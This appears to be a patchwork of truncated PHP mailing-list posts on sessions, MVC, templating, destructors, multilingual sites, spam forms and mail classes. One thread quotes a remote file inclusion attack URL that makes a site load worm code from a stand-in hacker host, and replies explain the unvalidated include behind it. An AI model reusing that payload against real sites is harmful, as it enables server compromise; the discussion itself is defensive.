Store everything in the database in an encrypted form.
Stuart Dallas wrote:
> On 22 Dec 2011, at 19:34, Paul M Foster wrote:
>
>> I have concerns that the items in a session buffer can be copied and
>> used to spoof legitimate logins. This is harder to do when the info is
>> held in a database
On 12/22/2011 2:54 PM, Stuart Dallas wrote:
On 22 Dec 2011, at 19:34, Paul M Foster wrote:
I have concerns that the items in a session buffer can be copied and
used to spoof legitimate logins. This is harder to do when the info is
held in a database.
Storing stuff in a database is no more s
On 22 Dec 2011, at 19:34, Paul M Foster wrote:
> I have concerns that the items in a session buffer can be copied and
> used to spoof legitimate logins. This is harder to do when the info is
> held in a database.
Storing stuff in a database is no more secure, it simply requires one single
extra
On Thu, Dec 22, 2011 at 12:55:41PM -0500, Al wrote:
>
>
> On 12/22/2011 10:05 AM, Paul M Foster wrote:
> >Not sure how to ask this question... I've always eschewed consulting a
> >database on page loads to determine if a user is logged in, primarily
> >because of latency issues. For example, you
On Mon, Sep 14, 2009 at 3:57 PM, Bastien Koert wrote:
> On Mon, Sep 14, 2009 at 3:29 PM, Marcus Gnaß wrote:
>> Tony Marston wrote:
>>
>>> You cannot do this in a separate class as it requires action in both the
>>> presentation (UI) and data access layers, and a single class is not allowed
>>> to
On Mon, Sep 14, 2009 at 3:29 PM, Marcus Gnaß wrote:
> Tony Marston wrote:
>
>> You cannot do this in a separate class as it requires action in both the
>> presentation (UI) and data access layers, and a single class is not allowed
>> to operate in more than one layer.
>
> You can, but you shouldn'
Tony Marston wrote:
> You cannot do this in a separate class as it requires action in both the
> presentation (UI) and data access layers, and a single class is not allowed
> to operate in more than one layer.
You can, but you shouldn't if you want to write your classes according
to the MVC pat
On Sun, Aug 9, 2009 at 9:29 AM, Sudheer Satyanarayana wrote:
> Michael A. Peters wrote:
>>
>> Ralph Deffke wrote:
>>>
>>> good question !! I think the word "framework" is modern fashion term in
>>> the
>>> first case. in former days we used to say "library" C comes with a
>>> standard
>>> library,
Michael A. Peters wrote:
Ralph Deffke wrote:
good question !! I think the word "framework" is modern fashion term
in the
first case. in former days we used to say "library" C comes with a
standard
library, in modern words C comes with a standard framework. I use my own
framework, means I reuse
Ralph Deffke wrote:
good question !! I think the word "framework" is modern fashion term in the
first case. in former days we used to say "library" C comes with a standard
library, in modern words C comes with a standard framework. I use my own
framework, means I reuse my code written for similar
On Fri, Jul 24, 2009 at 2:27 AM, Lupus Michaelis wrote:
> Andrew Ballard wrote:
>>
>> I'm trying to profile a site on our development server to see why it
>> takes around 4 seconds to generate a pretty basic page.
>
> Last time I seen this is when I did validate DOM Document without DTD on
> lo
Just an idea: try using the (microtime(true) - $start) approach in
portions of code to try isolate the portion that is taking more time.
Sometimes that helps me to find "the" function that is slowing
everything down.
Jonathan
On Thu, Jul 23, 2009 at 6:18 PM, Andrew Ballard wrote:
> On Thu, Jul 23
On Thu, Jul 23, 2009 at 5:10 PM, Ben Dunlap wrote:
>> significant (around 46%), it says they only account for 193ms. What
>> could account for that much difference between what xdebug calculates
>> versus the total elapsed time?
>
> Are you counting "total elapsed time" from the perspective of the
On Mar 5, 2009, at 4:16 AM, Robert Cummings wrote:
On Thu, 2009-03-05 at 03:08 -0800, Michael A. Peters wrote:
Robert Cummings wrote:
function hiddenInput($document,$name,$value) {
$input = $document->createElement("input");
$input->setAttribute("type","hidden");
$input->setAttri
Robert Cummings wrote:
Is there a reason I shouldn't be doing it that way?
I didn't say you shouldn't. It's just expensive on every page request to
regenerate a document node by node. it also strikes me as tedious :/
It's definitely tedious - but I end up writing functions that do the
tedi
On Thu, 2009-03-05 at 03:08 -0800, Michael A. Peters wrote:
> Robert Cummings wrote:
>
> >>
> >> function hiddenInput($document,$name,$value) {
> >> $input = $document->createElement("input");
> >> $input->setAttribute("type","hidden");
> >> $input->setAttribute("name",$name);
>
Robert Cummings wrote:
>>
>> function hiddenInput($document,$name,$value) {
>> $input = $document->createElement("input");
>> $input->setAttribute("type","hidden");
>> $input->setAttribute("name",$name);
>> $input->setAttribute("value",$value);
>> return($input);
>> }
>>
>
On Thu, 2009-03-05 at 02:04 -0800, Michael A. Peters wrote:
> Robert Cummings wrote:
> > On Wed, 2009-03-04 at 18:01 -0800, Michael A. Peters wrote:
> >> Robert Cummings wrote:
> >>> On Wed, 2009-03-04 at 15:21 -0800, Michael A. Peters wrote:
> Robert Cummings wrote:
>
> > To punt wha
Robert Cummings wrote:
On Wed, 2009-03-04 at 18:01 -0800, Michael A. Peters wrote:
Robert Cummings wrote:
On Wed, 2009-03-04 at 15:21 -0800, Michael A. Peters wrote:
Robert Cummings wrote:
To punt what is repeated over and over during runtime to a single
compilation phase when building the t
On Wed, 2009-03-04 at 21:42 -0700, Nathan Nobbe wrote:
> On Wed, Mar 4, 2009 at 7:01 PM, Michael A. Peters wrote:
>
> > echoing html involves mixing html and php.
> > Using an XML class (like DOMDocument) to build the document does not.
>
>
> ive actually written a little templating system which
On Wed, 2009-03-04 at 18:01 -0800, Michael A. Peters wrote:
> Robert Cummings wrote:
> > On Wed, 2009-03-04 at 15:21 -0800, Michael A. Peters wrote:
> >> Robert Cummings wrote:
> >>
> >>> To punt what is repeated over and over during runtime to a single
> >>> compilation phase when building the tem
On Wed, Mar 4, 2009 at 7:01 PM, Michael A. Peters wrote:
> Robert Cummings wrote:
>
>> On Wed, 2009-03-04 at 15:21 -0800, Michael A. Peters wrote:
>>
>>> Robert Cummings wrote:
>>>
>>> To punt what is repeated over and over during runtime to a single
compilation phase when building the temp
Robert Cummings wrote:
On Wed, 2009-03-04 at 15:21 -0800, Michael A. Peters wrote:
Robert Cummings wrote:
To punt what is repeated over and over during runtime to a single
compilation phase when building the template target. To simplify the use
of parameters so that they can be used in arbitra
On Wed, 2009-03-04 at 15:21 -0800, Michael A. Peters wrote:
> Robert Cummings wrote:
>
> >
> > To punt what is repeated over and over during runtime to a single
> > compilation phase when building the template target. To simplify the use
> > of parameters so that they can be used in arbitrary ord
Robert Cummings wrote:
To punt what is repeated over and over during runtime to a single
compilation phase when building the template target. To simplify the use
of parameters so that they can be used in arbitrary order with default
values. To allow for the encapsulation of complex content in t
On Wed, 2009-03-04 at 12:15 -0700, Nathan Nobbe wrote:
> On Wed, Mar 4, 2009 at 11:51 AM, Robert Cummings wrote:
>
> > On Wed, 2009-03-04 at 12:46 -0600, Shawn McKenzie wrote:
> > > Robert Cummings wrote:
> > > > On Wed, 2009-03-04 at 10:55 -0600, Shawn McKenzie wrote:
> > > >> Robert Cummings wro
On Wed, Mar 4, 2009 at 11:51 AM, Robert Cummings wrote:
> On Wed, 2009-03-04 at 12:46 -0600, Shawn McKenzie wrote:
> > Robert Cummings wrote:
> > > On Wed, 2009-03-04 at 10:55 -0600, Shawn McKenzie wrote:
> > >> Robert Cummings wrote:
> > >>> On Tue, 2009-03-03 at 21:18 -0600, Shawn McKenzie wrote
On Wed, 2009-03-04 at 12:46 -0600, Shawn McKenzie wrote:
> Robert Cummings wrote:
> > On Wed, 2009-03-04 at 10:55 -0600, Shawn McKenzie wrote:
> >> Robert Cummings wrote:
> >>> On Tue, 2009-03-03 at 21:18 -0600, Shawn McKenzie wrote:
> Matthew Croud wrote:
> > Hello,
> >
> > First
Robert Cummings wrote:
> On Wed, 2009-03-04 at 10:55 -0600, Shawn McKenzie wrote:
>> Robert Cummings wrote:
>>> On Tue, 2009-03-03 at 21:18 -0600, Shawn McKenzie wrote:
Matthew Croud wrote:
> Hello,
>
> First post here, I'm in the process of learning PHP , I'm digesting a
> few
On Wed, 2009-03-04 at 10:55 -0600, Shawn McKenzie wrote:
> Robert Cummings wrote:
> > On Tue, 2009-03-03 at 21:18 -0600, Shawn McKenzie wrote:
> >> Matthew Croud wrote:
> >>> Hello,
> >>>
> >>> First post here, I'm in the process of learning PHP , I'm digesting a
> >>> few books as we speak.
> >>>
Robert Cummings wrote:
> On Tue, 2009-03-03 at 21:18 -0600, Shawn McKenzie wrote:
>> Matthew Croud wrote:
>>> Hello,
>>>
>>> First post here, I'm in the process of learning PHP , I'm digesting a
>>> few books as we speak.
>>> I'm working on a content heavy website that provides a lot of
>>> informa
On Tue, 2009-03-03 at 21:18 -0600, Shawn McKenzie wrote:
> Matthew Croud wrote:
> > Hello,
> >
> > First post here, I'm in the process of learning PHP , I'm digesting a
> > few books as we speak.
> > I'm working on a content heavy website that provides a lot of
> > information, a template system w
Hi
I think what you are looking for is static Header Footer and dynamic
content.
One way of doing this is by having the front controller pattern
For example : consider the following list of files in your application
1000.php
2000.php
1001.php
3000.php
In the front controller Pattern we usually
On Tue, 2009-03-03 at 20:53 +0100, Martin Zvarík wrote:
> Matthew Croud wrote:
> > Hello,
> >
> > First post here, I'm in the process of learning PHP , I'm digesting a
> > few books as we speak.
> > I'm working on a content heavy website that provides a lot of
> > information, a template sys
On Wed, Oct 22, 2008 at 2:29 PM, Stut <[EMAIL PROTECTED]> wrote:
>
> Never any issues this way? They always run without a hitch?
>>
>
> Not had any issues so far, and it's being used on some pretty busy sites
> and various PHP versions and several different web servers.
>
>
Terrific! Thanks for
On 22 Oct 2008, at 09:35, Jochem Maas wrote:
Stut wrote:
On 22 Oct 2008, at 00:22, Jochem Maas wrote:
Stut wrote:
I use destructors to update dirty objects in memcache.
care to elaborate ... sounds interesting.
Nothing complicated. The core objects in my application are all
cached
i
On 22 Oct 2008, at 14:42, Dan Joseph wrote:
On Tue, Oct 21, 2008 at 5:14 PM, Stut <[EMAIL PROTECTED]> wrote:
When a script ends everything is released (with some small
exceptions),
thus also all references to instances of classes.
Thus AFAIK a deconstructor will always be called at the end of
On Wed, Oct 22, 2008 at 9:42 AM, Dan Joseph <[EMAIL PROTECTED]> wrote:
> On Tue, Oct 21, 2008 at 5:14 PM, Stut <[EMAIL PROTECTED]> wrote:
>
>>
>>
When a script ends everything is released (with some small exceptions),
thus also all references to instances of classes.
Thus AFAIK a dec
On Tue, Oct 21, 2008 at 5:14 PM, Stut <[EMAIL PROTECTED]> wrote:
>
>
>>> When a script ends everything is released (with some small exceptions),
>>> thus also all references to instances of classes.
>>> Thus AFAIK a deconstructor will always be called at the end of script
>>> execution.
>>>
>>>
>>
Stut wrote:
> On 22 Oct 2008, at 00:22, Jochem Maas wrote:
>> Stut wrote:
>>> I use destructors to update dirty objects in memcache.
>>
>> care to elaborate ... sounds interesting.
>
> Nothing complicated. The core objects in my application are all cached
> in memcache. If anything changes in
On 22 Oct 2008, at 00:22, Jochem Maas wrote:
Stut wrote:
I use destructors to update dirty objects in memcache.
care to elaborate ... sounds interesting.
Nothing complicated. The core objects in my application are all cached
in memcache. If anything changes in an object it changes an int
Stut wrote:
> On 21 Oct 2008, at 22:08, Jochem Maas wrote:
>> Mike van Riel wrote:
>>> Dan Joseph wrote:
Hi,
I want to make sure I completely understand __destruct() and when its
hit...
Understand that it will run if all references to a particular object
are
>
On 21 Oct 2008, at 22:08, Jochem Maas wrote:
Mike van Riel wrote:
Dan Joseph wrote:
Hi,
I want to make sure I completely understand __destruct() and when
its
hit...
Understand that it will run if all references to a particular
object are
removed, but is that also true when a page ends
Mike van Riel wrote:
> Dan Joseph wrote:
>> Hi,
>>
>> I want to make sure I completely understand __destruct() and when its
>> hit...
>>
>> Understand that it will run if all references to a particular object are
>> removed, but is that also true when a page ends its execution?
>>
>> Example, I c
Small correction $i = 4, means the last photo not 5..
Not so important but still.:P
2008/5/1 Joep Roebroek <[EMAIL PROTECTED]>:
> This problem is getting stranger by the minute.
> I will explain in a little more detail what the script is actually for..
> It is an advert site and per advert, you
This problem is getting stranger by the minute.
I will explain in a little more detail what the script is actually for..
It is an advert site and per advert, you can add 5 photos..
Now you set the $i = 2; When I set the $i (which indicates the index
of the photo, so $i = 5; is the last photo) my
Do you have a piece of example code that will reproduce the problem?
--
/James
On Thu, May 1, 2008 at 12:26 PM, Joep Roebroek <[EMAIL PROTECTED]> wrote:
> Strangely enough.. It does.. But I have also tried adding a letter
> (which gives me the good result) and then renaming it... But then the
>
Strangely enough.. It does.. But I have also tried adding a letter
(which gives me the good result) and then renaming it... But then the
value is wrong again :S
I've never had a problem like this.. Very strange..
2008/5/1 James Dempster <[EMAIL PROTECTED]>:
>
> $foldersystem = getcwd().'/test1';
returns exactly what I
want.
//attempt to create folder
mkdir($foldersystem);
chmod($foldersystem, 0777);
//save picture
if(!($handle = fopen($imagenamesmall, 'w'))){
echo "Cannot open file (31)";
exit;
}
This code works for me. How about you ?
--
/James
On Thu, May 1, 2008 at 11:04 AM,
On Tue, February 12, 2008 3:32 pm, Jason Pruim wrote:
>
> On Feb 12, 2008, at 4:24 PM, Daniel Brown wrote:
>
>> On Feb 12, 2008 2:53 PM, Nathan Rixham <[EMAIL PROTECTED]> wrote:
>>> Browsers generally send the HTTP_ACCEPT_LANGUAGE header in a
>>> request.
>>>
>>> $_SERVER[HTTP_ACCEPT_LANGUAGE]
On Feb 12, 2008, at 4:24 PM, Daniel Brown wrote:
On Feb 12, 2008 2:53 PM, Nathan Rixham <[EMAIL PROTECTED]> wrote:
Browsers generally send the HTTP_ACCEPT_LANGUAGE header in a
request.
$_SERVER[HTTP_ACCEPT_LANGUAGE] => en-gb,en;q=0.5
thus with mine, preference is en-gb, failing that an
On Feb 12, 2008 2:53 PM, Nathan Rixham <[EMAIL PROTECTED]> wrote:
> Browsers generally send the HTTP_ACCEPT_LANGUAGE header in a request.
>
> $_SERVER[HTTP_ACCEPT_LANGUAGE] => en-gb,en;q=0.5
>
> thus with mine, preference is en-gb, failing that anything en; failing
> that whatever you've got.
>
> Jason Pruim wrote:
On Feb 12, 2008, at 2:09 PM, Aleksandar Vojnovic wrote:
Could you explain this a little better - "...into using a database[1]
for storing the
pages and using browser sniffing to find out what language preference
they currently had
selected to display in that language"?
Jason,
If you don't mind I may give you an email off the list in a moment to
brain storm up a quick list of questions to ask clients and indeed
client "gotchas".
For the time being as this seems to be going down the line of how to
handle multilingual sites here's my two pennies.
XML, store
On Feb 12, 2008, at 2:09 PM, Aleksandar Vojnovic wrote:
Could you explain this a little better - "...into using a
database[1] for storing the
pages and using browser sniffing to find out what language
preference they currently had
selected to display in that language"?
Aleksandar
I'll t
Could you explain this a little better - "...into using a database[1]
for storing the
pages and using browser sniffing to find out what language preference
they currently had
selected to display in that language"?
Aleksandar
Quoting Jason Pruim <[EMAIL PROTECTED]>:
On Feb 12, 2008, at 1:0
Jason Pruim wrote:
>
> On Feb 12, 2008, at 1:03 PM, Nathan Rixham wrote:
>
>> Jason Pruim wrote:
>>> Hi Everyone,
>>> I know this isn't 100% on topic... But when is any post to this list
>>> 100% on topic? :)
>>> I've been doing some googling trying to find info on how to plan for
>>> what a webs
Jason Pruim <[EMAIL PROTECTED]> wrote:
>
> On Feb 12, 2008, at 1:03 PM, Nathan Rixham wrote:
>
> > Jason Pruim wrote:
> >> Hi Everyone,
> >> I know this isn't 100% on topic... But when is any post to this
> >> list 100% on topic? :)
> >> I've been doing some googling trying to find info
On Feb 12, 2008, at 1:03 PM, Nathan Rixham wrote:
Jason Pruim wrote:
Hi Everyone,
I know this isn't 100% on topic... But when is any post to this
list 100% on topic? :)
I've been doing some googling trying to find info on how to plan
for what a website needs. Stuff like Does it need a foru
Richard Lynch wrote:
> On Fri, January 18, 2008 10:41 am, Per Jessen wrote:
>> 2. check that the domain exists and has an MX.
>
> I believe this will foul you up...
>
> I *think* many domains just use their regular domain as MX if there is
> no MX.
We've been using the method on public forms fo
On Fri, January 18, 2008 10:41 am, Per Jessen wrote:
> 2. check that the domain exists and has an MX.
I believe this will foul you up...
I *think* many domains just use their regular domain as MX if there is
no MX.
And the Bad Guy can easily change tactics to use [EMAIL PROTECTED] or
whatever, o
> What does your form actually do? Does it email you, >email them, stick
> something in a DB? What?
>
The form sends an email to a listserv and cc's the sender and then enters
data into a database.
> Regardless, if they're entering a nonsense email address >and are
> managing to get your scr
Javier Huerta wrote:
> Thanks for all of your suggestions which all point to using Captcha.
> I have actually already implemented Captcha and they are still getting
> around it. Even if they are entering it manually rather than via a
> bot, is there a way to check if the email address is of a spe
On 18 Jan 2008, at 16:01, Eric Butera wrote:
On Jan 18, 2008 10:55 AM, Javier Huerta <[EMAIL PROTECTED]>
wrote:
Thanks for all of your suggestions which all point to using
Captcha. I have
actually already implemented Captcha and they are still getting
around it.
Even if they are entering i
On Jan 18, 2008 10:55 AM, Javier Huerta <[EMAIL PROTECTED]> wrote:
> Thanks for all of your suggestions which all point to using Captcha. I have
> actually already implemented Captcha and they are still getting around it.
> Even if they are entering it manually rather than via a bot, is there a wa
On Tue, January 15, 2008 11:03 pm, Manuel Lemos wrote:
> Hello,
>
> on 01/16/2008 02:11 AM mike said the following:
>> Why not look at phpmailer? Probably more robust than some random
>> classes.
>
> I did not suggest any random classes. I developed those classes since
> 1999 and I know they work
mike said the following on 2008-1-16 12:11:
> Why not look at phpmailer? Probably more robust than some random classes.
>
> http://phpmailer.codeworxtech.com/
>
Thanks Mike. I will try both and tell you guys I like which one.
On 1/15/08, Manuel Lemos <[EMAIL PROTECTED]> wrote:
> You are missing my point. One thing is disliking somebody's work for
> whatever reasons, another thing is acting disrespectfully and call it
> crappy in a public forum. If you don't know how to act respectfully with
> other PHP developers, I have
Hello,
on 01/16/2008 03:25 AM mike said the following:
> This list is democratic as well. Personal experience has led me there
> from many Google queries, and none of the code has been usable.
That does not give you the right to generalize and call all the code in
the site crappy, including the t
Hello,
on 01/16/2008 02:11 AM mike said the following:
> Why not look at phpmailer? Probably more robust than some random classes.
I did not suggest any random classes. I developed those classes since
1999 and I know they work reliably because they are used by me and tens
of thousands of users th
> -Original Message-
> From: mike [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, January 16, 2008 1:11 AM
> To: Wang Chen
> Cc: php-general@lists.php.net
> Subject: Re: [PHP] Re: [QUESTION] MAIL: Send a NOOP instead of DATA
>
> Why not look at phpmailer? Probab
This list is democratic as well. Personal experience has led me there
from many Google queries, and none of the code has been usable.
I give you props for creating a site and classes on it and such, but
this list is for people to ask and share opinions. I said it was not
to badmouth you but my per
Hello,
on 01/16/2008 02:11 AM mike said the following:
> Why not look at phpmailer? Probably more robust than some random classes.
I did not suggest any random classes. I developed those classes since
1999 and I know they work reliably because they are used by me and tens
of thousands of users th
Why not look at phpmailer? Probably more robust than some random classes.
http://phpmailer.codeworxtech.com/
Not to bash on Manuel, but I find phpclasses to be littered with lots
of crappy code and is too ad-laden and hard to use for me to bother.
On 1/15/08, Wang Chen <[EMAIL PROTECTED]> wrote:
On 4/11/07, Steve <[EMAIL PROTECTED]> wrote:
If you're working under an NDA or on code that doesn't belong to you, you'll
most likely need to hit up the hobbyist side of programming to build your
portfolio. Sit down, plan some app that would make your life easier (or
someone else's), go through t
Richard Lynch wrote:
On Tue, March 20, 2007 3:31 pm, Dan Shirah wrote:
Because in my application it is VERY VERY VERY important that I track
the
specific details for any given user in any given account. The user
data
changes frequently and I need to be able to track user information
changes,
nu
On Tue, March 20, 2007 3:31 pm, Dan Shirah wrote:
> Because in my application it is VERY VERY VERY important that I track
> the
> specific details for any given user in any given account. The user
> data
> changes frequently and I need to be able to track user information
> changes,
> numbers of a
On Tue, March 20, 2007 2:05 pm, Dan Shirah wrote:
> Each account is unique. It is possible that the same user could be on
> multiple accounts, therefore the account will be tied to the user each
> time.
If each account can have multiple users, AND each user can have
multiple accounts, then you ha
On Tue, 2007-03-20 at 16:31, Dan Shirah wrote:
> Because in my application it is VERY VERY VERY important that I track the
> specific details for any given user in any given account. The user data
> changes frequently and I need to be able to track user information changes,
> number
Because in my application it is VERY VERY VERY important that I track the
specific details for any given user in any given account. The user data
changes frequently and I need to be able to track user information changes,
numbers of accounts they are assigned to etc.
So rather than updating the
Dan Shirah wrote:
I had thought about having the multiple submissions on a single form, but
with the amount of user information that is collected and the variable
amount of users that may need to be entered this method would not be ideal.
(A single form that you have to scroll down a far way and
On Thu, March 15, 2007 9:15 am, Seak, Teng-Fong wrote:
> Stut wrote:
>> Seak, Teng-Fong wrote:
>>> But after I've spent some time reading the log files, I've
>>> finally
>>> found out how the hackers managed to achieve worm infiltration.
>>>
>>> Actually, they're using an URL like this:
>>>
>
> Seak, Teng-Fong wrote:
> > No, I don't deserve anything because, as I've written in the
> > original post (but I suppose you didn't notice), the website is
> > outsourced and made by a 3rd company.
Then you should be having this conversation with the 3rd party. They need
to validate *EVERY*
Seak, Teng-Fong wrote:
> No, I don't deserve anything because, as I've written in the
> original post (but I suppose you didn't notice), the website is
> outsourced and made by a 3rd company.
Well, I've just realised (and checked) that I forgot to mention that
my company's website was outsource
> -Original Message-
> From: Richard Lynch [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, 14 March 2007 23:45
> To: Tim
> Cc: 'Haydar Tuna'; php-general@lists.php.net
> Subject: RE: [PHP] Re: question regarding form filtering
>
> On Wed, Marc
Turn off register_globals - if you pollute your scripts with global
variables like that you are asking for trouble. If you can't, make sure you
clean the variable.
Using include("$page.php") is asking for trouble.
If you can get register_globals switched off (it's off by default in PHP5
for this
Stut wrote:
> Seak, Teng-Fong wrote:
>> But after I've spent some time reading the log files, I've finally
>> found out how the hackers managed to achieve worm infiltration.
>>
>> Actually, they're using an URL like this:
>> http://my-domain.com/index.php?page=http://hacker-domain.com/some-
On Wed, March 14, 2007 9:07 am, Tim wrote:
>> You almost for sure do *NOT* want to attempt to send the
>> entire Webster's 2nd Edition dictionary to the browser as JS
>> data so that the JS can check. :-)
>
> Hehe, oh? Really? ;-)
>
>> I suppose you could do a Web 2.0 Ajax-y thingie for that...
> -Original Message-
> From: Richard Lynch [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, 14 March 2007 09:48
> To: Tim
> Cc: 'Haydar Tuna'; php-general@lists.php.net
> Subject: RE: [PHP] Re: question regarding form filtering
>
> I personally
I personally would not presume that PHP and JS regex patterns are 100%
compatible...
Store a separate pattern for each.
And, actually, the PHP check might be more involved than the JS check.
For example, if the user is making up a password, and this password
has access to something that's actua
> -Original Message-
> From: Haydar Tuna [mailto:[EMAIL PROTECTED]
> Sent: Tuesday, 13 March 2007 14:53
> To: php-general@lists.php.net
> Subject: [PHP] Re: question regarding form filtering
>
> Hello,
>You can write some basic functions such as checking
> length of variable, re
On Sat, 2007-03-03 at 14:02 +0100, Tim wrote:
>
> Once you are comfortable with this, before you use a script downloaded from
> the inet in a production environment, go through the code and make sure you
> don't see any backdoor code (unnecessary fsockopen(), exec() etc.. That isn't
> related to the
> -Original Message-
> From: Stut [mailto:[EMAIL PROTECTED]
> Sent: Friday, 2 March 2007 20:23
> To: Seak, Teng-Fong
> Cc: php-windows@lists.php.net; php-general@lists.php.net
> Subject: Re: [PHP] Re: Question on virus/worms
>
> Seak, Teng-Fong wrote:
>
Seak, Teng-Fong wrote:
But after I've spent some time reading the log files, I've finally
found out how the hackers managed to achieve worm infiltration.
Actually, they're using an URL like this:
http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt?
And th
On Sun, 2007-01-07 at 19:39 +0100, [EMAIL PROTECTED] wrote:
> On 5 Jan 2007, [EMAIL PROTECTED] wrote:
>
> >
> > On Fri, 2007-01-05 at 22:07 +0100, Jochem Maas wrote:
> >> reply at the bottom ...
> >>
> >> (Karl Pflästerer) wrote:
> >> > Hi
> >> > let's say we have the following directory structur
Richard Lynch wrote:
> On Wed, June 28, 2006 5:07 pm, Jochem Maas wrote:
>> zend.ze1_compatibility_mode is next to useless in practice for
>> anything
>> but the most simple php4 OO code. certainly if you are wanting to
>> use php5 specific OO functionality like __destruct() you should not be
>> us
On Wed, June 28, 2006 5:07 pm, Jochem Maas wrote:
> zend.ze1_compatibility_mode is next to useless in practice for
> anything
> but the most simple php4 OO code. certainly if you are wanting to
> use php5 specific OO functionality like __destruct() you should not be
> using
> ze1_compatibility_mode
I tested on linux also and found no problem ...
Mathieu Dumoulin wrote:
> For all to know
>
> This bug is linux AND windows, the problem is caused when you have the
>
> zend.ze1_compatibility_mode = On
now it makes sense ... someone else offered a pretty good explanation
as to why you see the '
> For all to know
> This bug is linux AND windows, the problem is caused when you have the
> zend.ze1_compatibility_mode = On
> in the php.ini file. This is a bug that was reported before several
> times without having been resolved. I commented and reactivated the bug
> on the php bug submissio
Thnx for the tip. I wanted debug features only for this function. So
working with debug_backtrace() was what I needed.
Thnx again,
Andrei
Richard Lynch wrote:
On Tue, January 31, 2006 6:40 am, Andrei wrote:
Well I know, I wanted to know if any1 did find a workaround...
To be more clear, sin